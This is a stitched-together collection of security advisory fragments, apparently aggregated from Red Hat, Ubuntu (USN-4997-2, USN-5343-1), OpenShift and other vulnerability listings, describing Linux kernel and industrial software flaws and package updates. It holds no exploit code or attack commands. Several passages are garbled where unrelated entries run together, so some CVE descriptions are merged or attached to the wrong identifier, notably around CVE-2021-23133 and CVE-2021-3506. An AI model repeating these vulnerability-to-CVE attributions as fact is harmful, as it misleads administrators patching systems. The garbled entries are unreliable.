kernel-rt-4.18.0-348.rt7.130.el8.x86_64.rpm kernel-rt-core-4.18.0-348.rt7.130.el8.x86_64.rpm kernel-rt-debug-4.18.0-348.rt7.130.el8.x86_64.rpm kernel-rt-debug-core-4.18.0-348.rt7.130.el8.x86_64.rpm kernel-rt-debug-debuginfo-4.18.0-348.rt7.130.el8.x86_64.rpm kernel-rt-debug-devel-4.18.0-348.rt7.130.el8.x86_64.rpm kernel-rt-debug-modules-4.18.0-348.rt7.130.el8.x86_64.rpm kernel-rt-debug-modules-extra-4.18.0-348.rt7.130.el8.x86_64.rpm kernel-rt-debuginfo-4.18.0-348.rt7.130.el8.x86_64.rpm kernel-rt-debuginfo-common-x86_64-4.18.0-348.rt7.130.el8.x86_64.rpm kernel-rt-devel-4.18.0-348.rt7.130.el8.x86_64.rpm kernel-rt-modules-4.18.0-348.rt7.130.el8.x86_64.rpm kernel-rt-modules-extra-4.18.0-348.rt7.130.el8.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIVAwUBYYre49zjgjWX9erEAQhgMQ/7BqqKbZkZDUEDyUeAzIUcDicxQ3b0LM3D jM/Iyk+ZN1YCjlhovu1Y6vI2eYDzW9YLIsaPJUg4ZnliClQckKZM4wVqjb881j6g 2l1Pj+9r99OQsqOHoRMHC0XhwQjGITwG8YWYf8vRlEVsQHFGDz1PBK7rdgt4adMb olziPhDRSdfeTUETLOPzpRyePDv6UghcN841SBYXy1OnWROANm0gVAOTpFtqFgaC RJQJkGGdpaBnRkwyqPUG9NYPwLDkVxjNM/ku6eDfZ9D3zBKdULzxfGNOoMAIXvxS t8mC2quyy0HE6320Wj+q78kRUyvRBJHbNiYRKrmvkDrm2g6lxaB3d4ZN4uMq8wY8 7tMonZGZd8O3pnT2Lpr71pYSb5YC8TceYshMQHU+m40v+ByWQuuOvCXM636/iphr wgv7a6fvku5H/XVQs34u4RldobhDmEdwPd4vQ+IfoSz7uouBwWjD9Fkm1JBeZ3oC 0A/D2rLT+uCTszWqzp9Rz61iMKIqEiLPirgVNnWdYskv0HO+2ePYiXjGdSRqXnIT q1ypdKCqHYHuDdxk468fH0bToxjbjpbVS43Vkhzof44MqS+iGotpRUnOZeWjmKRp 8Fe3BHS4cXWkqrxzMcHMVHP1/7XV82o4RgqDQvnvxo71DOvZxfDwEzyTUHF1LiYZ nbdCAvai1OE=/lv0 -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Bugs fixed (https://bugzilla.redhat.com/): 2030932 - CVE-2021-44228 log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value 5. ========================================================================== Ubuntu Security Notice USN-4997-2 June 25, 2021 linux-kvm vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 21.04 Summary: Several security issues were fixed in the Linux kernel. Software Description: - linux-kvm: Linux kernel for cloud environments Details: USN-4997-1 fixed vulnerabilities in the Linux kernel for Ubuntu 21.04. This update provides the corresponding updates for the Linux KVM kernel for Ubuntu 21.04. A local attacker could use this issue to execute arbitrary code. (CVE-2021-3609) Piotr Krysiuk discovered that the eBPF implementation in the Linux kernel did not properly enforce limits for pointer operations. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-33200) Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation did not properly clear received fragments from memory in some situations. A physically proximate attacker could possibly use this issue to inject packets or expose sensitive information. (CVE-2020-24586) Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation incorrectly handled encrypted fragments. A physically proximate attacker could possibly use this issue to decrypt fragments. (CVE-2020-24587) Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation incorrectly handled certain malformed frames. If a user were tricked into connecting to a malicious server, a physically proximate attacker could use this issue to inject packets. (CVE-2020-24588) Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation incorrectly handled EAPOL frames from unauthenticated senders. A physically proximate attacker could inject malicious packets to cause a denial of service (system crash). (CVE-2020-26139) Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation did not properly verify certain fragmented frames. A physically proximate attacker could possibly use this issue to inject or decrypt packets. (CVE-2020-26141) Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation accepted plaintext fragments in certain situations. A physically proximate attacker could use this issue to inject packets. (CVE-2020-26145) Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation could reassemble mixed encrypted and plaintext fragments. A physically proximate attacker could possibly use this issue to inject packets or exfiltrate selected fragments. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-23133) Or Cohen and Nadav Markus discovered a use-after-free vulnerability in the nfc implementation in the Linux kernel. A privileged local attacker could use this issue to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-23134) Manfred Paul discovered that the extended Berkeley Packet Filter (eBPF) implementation in the Linux kernel contained an out-of-bounds vulnerability. A local attacker could use this issue to execute arbitrary code. (CVE-2021-31440) Piotr Krysiuk discovered that the eBPF implementation in the Linux kernel did not properly prevent speculative loads in certain situations. A local attacker could use this to expose sensitive information (kernel memory). An attacker could use this issue to possibly execute arbitrary code. (CVE-2021-32399) It was discovered that a use-after-free existed in the Bluetooth HCI driver of the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-33034) It was discovered that an out-of-bounds (OOB) memory access flaw existed in the f2fs module of the Linux kernel. A local attacker could use this issue to cause a denial of service (system crash). (CVE-2021-3506) Mathias Krause discovered that a null pointer dereference existed in the Nitro Enclaves kernel driver of the Linux kernel. A local attacker could use this issue to cause a denial of service or possibly execute arbitrary code. (CVE-2021-3543) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 21.04: linux-image-5.11.0-1009-kvm 5.11.0-1009.9 linux-image-kvm 5.11.0.1009.9 After a standard system update you need to reboot your computer to make all the necessary changes. ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well. References: https://ubuntu.com/security/notices/USN-4997-2 https://ubuntu.com/security/notices/USN-4997-1 CVE-2020-24586, CVE-2020-24587, CVE-2020-24588, CVE-2020-26139, CVE-2020-26141, CVE-2020-26145, CVE-2020-26147, CVE-2021-23133, CVE-2021-23134, CVE-2021-31440, CVE-2021-31829, CVE-2021-32399, CVE-2021-33034, CVE-2021-33200, CVE-2021-3506, CVE-2021-3543, CVE-2021-3609 Package Information: https://launchpad.net/ubuntu/+source/linux-kvm/5.11.0-1009.9 . Solution: For OpenShift Container Platform 4.9 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update: https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html For Red Hat OpenShift Logging 5.3, see the following instructions to apply this update: https://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html 4. Bugs fixed (https://bugzilla.redhat.com/): 1963232 - CVE-2021-33194 golang: x/net/html: infinite loop in ParseFragment 5. JIRA issues fixed (https://issues.jboss.org/): LOG-1168 - Disable hostname verification in syslog TLS settings LOG-1235 - Using HTTPS without a secret does not translate into the correct 'scheme' value in Fluentd LOG-1375 - ssl_ca_cert should be optional LOG-1378 - CLO should support sasl_plaintext(Password over http) LOG-1392 - In fluentd config, flush_interval can't be set with flush_mode=immediate LOG-1494 - Syslog output is serializing json incorrectly LOG-1555 - Fluentd logs emit transaction failed: error_class=NoMethodError while forwarding to external syslog server LOG-1575 - Rejected by Elasticsearch and unexpected json-parsing LOG-1735 - Regression introducing flush_at_shutdown LOG-1774 - The collector logs should be excluded in fluent.conf LOG-1776 - fluentd total_limit_size sets value beyond available space LOG-1822 - OpenShift Alerting Rules Style-Guide Compliance LOG-1859 - CLO Should not error and exit early on missing ca-bundle when cluster wide proxy is not enabled LOG-1862 - Unsupported kafka parameters when enabled Kafka SASL LOG-1903 - Fix the Display of ClusterLogging type in OLM LOG-1911 - CLF API changes to Opt-in to multiline error detection LOG-1918 - Alert `FluentdNodeDown` always firing LOG-1939 - Opt-in multiline detection breaks cloudwatch forwarding 6

An out-of-bounds (OOB) memory access flaw was found in fs/f2fs/node.c in the f2fs module in the Linux kernel in versions before 5.12.0-rc4. A bounds check failure allows a local attacker to gain access to out-of-bounds memory leading to a system crash or a leak of internal kernel information. The highest threat from this vulnerability is to system availability. Linux Kernel Exists in an out-of-bounds read vulnerability.Information is obtained and service operation is interrupted (DoS) It may be in a state. The vulnerability stems from a boundary check failure. ========================================================================== Ubuntu Security Notice USN-5343-1 March 22, 2022 linux, linux-aws, linux-kvm, linux-lts-xenial vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 16.04 ESM - Ubuntu 14.04 ESM Summary: Several security issues were fixed in the Linux kernel. Software Description: - linux: Linux kernel - linux-aws: Linux kernel for Amazon Web Services (AWS) systems - linux-kvm: Linux kernel for cloud environments - linux-lts-xenial: Linux hardware enablement kernel from Xenial for Trusty Details: Yiqi Sun and Kevin Wang discovered that the cgroups implementation in the Linux kernel did not properly restrict access to the cgroups v1 release_agent feature. A local attacker could use this to gain administrative privileges. (CVE-2022-0492) It was discovered that the aufs file system in the Linux kernel did not properly restrict mount namespaces, when mounted with the non-default allow_userns option set. A local attacker could use this to gain administrative privileges. (CVE-2016-2853) It was discovered that the aufs file system in the Linux kernel did not properly maintain POSIX ACL xattr data, when mounted with the non-default allow_userns option. A local attacker could possibly use this to gain elevated privileges. (CVE-2016-2854) It was discovered that the f2fs file system in the Linux kernel did not properly validate metadata in some situations. An attacker could use this to construct a malicious f2fs image that, when mounted and operated on, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-19449) It was discovered that the XFS file system implementation in the Linux kernel did not properly validate meta data in some circumstances. An attacker could use this to construct a malicious XFS image that, when mounted, could cause a denial of service. (CVE-2020-12655) Kiyin (尹亮) discovered that the NFC LLCP protocol implementation in the Linux kernel contained a reference counting error. A local attacker could use this to cause a denial of service (system crash). (CVE-2020-25670) Kiyin (尹亮) discovered that the NFC LLCP protocol implementation in the Linux kernel did not properly deallocate memory in certain error situations. A local attacker could use this to cause a denial of service (memory exhaustion). (CVE-2020-25671, CVE-2020-25672) Kiyin (尹亮) discovered that the NFC LLCP protocol implementation in the Linux kernel did not properly handle error conditions in some situations, leading to an infinite loop. A local attacker could use this to cause a denial of service. (CVE-2020-25673) Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation incorrectly handled EAPOL frames from unauthenticated senders. A physically proximate attacker could inject malicious packets to cause a denial of service (system crash). (CVE-2020-26139) Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation could reassemble mixed encrypted and plaintext fragments. A physically proximate attacker could possibly use this issue to inject packets or exfiltrate selected fragments. (CVE-2020-26147) It was discovered that the BR/EDR pin-code pairing procedure in the Linux kernel was vulnerable to an impersonation attack. A physically proximate attacker could possibly use this to pair to a device without knowledge of the pin-code. An authenticated attacker could possibly use this to expose sensitive information. (CVE-2020-26558, CVE-2021-0129) It was discovered that the FUSE user space file system implementation in the Linux kernel did not properly handle bad inodes in some situations. A local attacker could possibly use this to cause a denial of service. (CVE-2020-36322) It was discovered that the Infiniband RDMA userspace connection manager implementation in the Linux kernel contained a race condition leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possible execute arbitrary code. (CVE-2020-36385) It was discovered that the DRM subsystem in the Linux kernel contained double-free vulnerabilities. A privileged attacker could possibly use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-20292) It was discovered that a race condition existed in the timer implementation in the Linux kernel. A privileged attacker could use this to cause a denial of service. (CVE-2021-20317) Or Cohen and Nadav Markus discovered a use-after-free vulnerability in the nfc implementation in the Linux kernel. A privileged local attacker could use this issue to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-23134) It was discovered that the Xen paravirtualization backend in the Linux kernel did not properly deallocate memory in some situations. A local attacker could use this to cause a denial of service (memory exhaustion). (CVE-2021-28688) It was discovered that the RPA PCI Hotplug driver implementation in the Linux kernel did not properly handle device name writes via sysfs, leading to a buffer overflow. A privileged attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-28972) It was discovered that a race condition existed in the netfilter subsystem of the Linux kernel when replacing tables. A local attacker could use this to cause a denial of service (system crash). (CVE-2021-29650) It was discovered that a race condition in the kernel Bluetooth subsystem could lead to use-after-free of slab objects. An attacker could use this issue to possibly execute arbitrary code. (CVE-2021-32399) It was discovered that the CIPSO implementation in the Linux kernel did not properly perform reference counting in some situations, leading to use- after-free vulnerabilities. An attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-33033) It was discovered that a use-after-free existed in the Bluetooth HCI driver of the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-33034) Asaf Modelevsky discovered that the Intel(R) Ethernet ixgbe driver for the Linux kernel did not properly validate large MTU requests from Virtual Function (VF) devices. A local attacker could possibly use this to cause a denial of service. (CVE-2021-33098) Norbert Slusarek discovered that the CAN broadcast manger (bcm) protocol implementation in the Linux kernel did not properly initialize memory in some situations. (CVE-2021-34693) 马哲宇 discovered that the IEEE 1394 (Firewire) nosy packet sniffer driver in the Linux kernel did not properly perform reference counting in some situations, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. A local attacker could use this issue to cause a denial of service (system crash). (CVE-2021-3506) It was discovered that the bluetooth subsystem in the Linux kernel did not properly handle HCI device initialization failure, leading to a double-free vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. (CVE-2021-3564) It was discovered that the bluetooth subsystem in the Linux kernel did not properly handle HCI device detach events, leading to a use-after-free vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. (CVE-2021-3573) Murray McAllister discovered that the joystick device interface in the Linux kernel did not properly validate data passed via an ioctl(). A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code on systems with a joystick device registered. (CVE-2021-3612) It was discovered that the tracing subsystem in the Linux kernel did not properly keep track of per-cpu ring buffer state. A privileged attacker could use this to cause a denial of service. (CVE-2021-3679) It was discovered that the Virtio console implementation in the Linux kernel did not properly validate input lengths in some situations. A local attacker could possibly use this to cause a denial of service (system crash). (CVE-2021-38160) It was discovered that the KVM hypervisor implementation in the Linux kernel did not properly compute the access permissions for shadow pages in some situations. A local attacker could use this to cause a denial of service. (CVE-2021-38198) It was discovered that the MAX-3421 host USB device driver in the Linux kernel did not properly handle device removal events. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2021-38204) It was discovered that the NFC implementation in the Linux kernel did not properly handle failed connect events leading to a NULL pointer dereference. A local attacker could use this to cause a denial of service. (CVE-2021-38208) It was discovered that the configfs interface for USB gadgets in the Linux kernel contained a race condition. (CVE-2021-39648) It was discovered that the ext4 file system in the Linux kernel contained a race condition when writing xattrs to an inode. A local attacker could use this to cause a denial of service or possibly gain administrative privileges. (CVE-2021-40490) It was discovered that the 6pack network protocol driver in the Linux kernel did not properly perform validation checks. A privileged attacker could use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2021-42008) It was discovered that the ISDN CAPI implementation in the Linux kernel contained a race condition in certain situations that could trigger an array out-of-bounds bug. A privileged local attacker could possibly use this to cause a denial of service or execute arbitrary code. (CVE-2021-43389) It was discovered that the Phone Network protocol (PhoNet) implementation in the Linux kernel did not properly perform reference counting in some error conditions. A local attacker could possibly use this to cause a denial of service (memory exhaustion). (CVE-2021-45095) Wenqing Liu discovered that the f2fs file system in the Linux kernel did not properly validate the last xattr entry in an inode. An attacker could use this to construct a malicious f2fs image that, when mounted and operated on, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-45469) Amit Klein discovered that the IPv6 implementation in the Linux kernel could disclose internal state in some situations. An attacker could possibly use this to expose sensitive information. (CVE-2021-45485) It was discovered that the per cpu memory allocator in the Linux kernel could report kernel pointers via dmesg. An attacker could use this to expose sensitive information or in conjunction with another kernel vulnerability. (CVE-2018-5995) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 16.04 ESM: linux-image-4.4.0-1103-kvm 4.4.0-1103.112 linux-image-4.4.0-1138-aws 4.4.0-1138.152 linux-image-4.4.0-222-generic 4.4.0-222.255 linux-image-4.4.0-222-lowlatency 4.4.0-222.255 linux-image-aws 4.4.0.1138.143 linux-image-generic 4.4.0.222.229 linux-image-kvm 4.4.0.1103.101 linux-image-lowlatency 4.4.0.222.229 linux-image-virtual 4.4.0.222.229 Ubuntu 14.04 ESM: linux-image-4.4.0-1102-aws 4.4.0-1102.107 linux-image-4.4.0-222-generic 4.4.0-222.255~14.04.1 linux-image-4.4.0-222-lowlatency 4.4.0-222.255~14.04.1 linux-image-aws 4.4.0.1102.100 linux-image-generic-lts-xenial 4.4.0.222.193 linux-image-lowlatency-lts-xenial 4.4.0.222.193 linux-image-virtual-lts-xenial 4.4.0.222.193 After a standard system update you need to reboot your computer to make all the necessary changes. ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well. References: https://ubuntu.com/security/notices/USN-5343-1 CVE-2016-2853, CVE-2016-2854, CVE-2018-5995, CVE-2019-19449, CVE-2020-12655, CVE-2020-25670, CVE-2020-25671, CVE-2020-25672, CVE-2020-25673, CVE-2020-26139, CVE-2020-26147, CVE-2020-26555, CVE-2020-26558, CVE-2020-36322, CVE-2020-36385, CVE-2021-0129, CVE-2021-20292, CVE-2021-20317, CVE-2021-23134, CVE-2021-28688, CVE-2021-28972, CVE-2021-29650, CVE-2021-32399, CVE-2021-33033, CVE-2021-33034, CVE-2021-33098, CVE-2021-34693, CVE-2021-3483, CVE-2021-3506, CVE-2021-3564, CVE-2021-3573, CVE-2021-3612, CVE-2021-3679, CVE-2021-38160, CVE-2021-38198, CVE-2021-38204, CVE-2021-38208, CVE-2021-39648, CVE-2021-40490, CVE-2021-42008, CVE-2021-43389, CVE-2021-45095, CVE-2021-45469, CVE-2021-45485, CVE-2022-0492 . This update provides the corresponding updates for the Linux KVM kernel for Ubuntu 21.04

IBM Resilient SOAR V38.0 could allow a privileged user to create create malicious scripts that could be executed as another user. IBM X-Force ID: 198759

Daqing Zijinqiao Software Technology Co., Ltd. is one of the earliest companies in China to develop domestic large-scale real-time database products. The Zijinqiao monitoring configuration software has a buffer overflow vulnerability, which can be exploited by attackers to cause arbitrary code execution.

Quick control configuration software is a monitoring software used in industrial power and other fields. There is a binary loophole in the quick control configuration software. Attackers can use vulnerabilities to execute arbitrary code.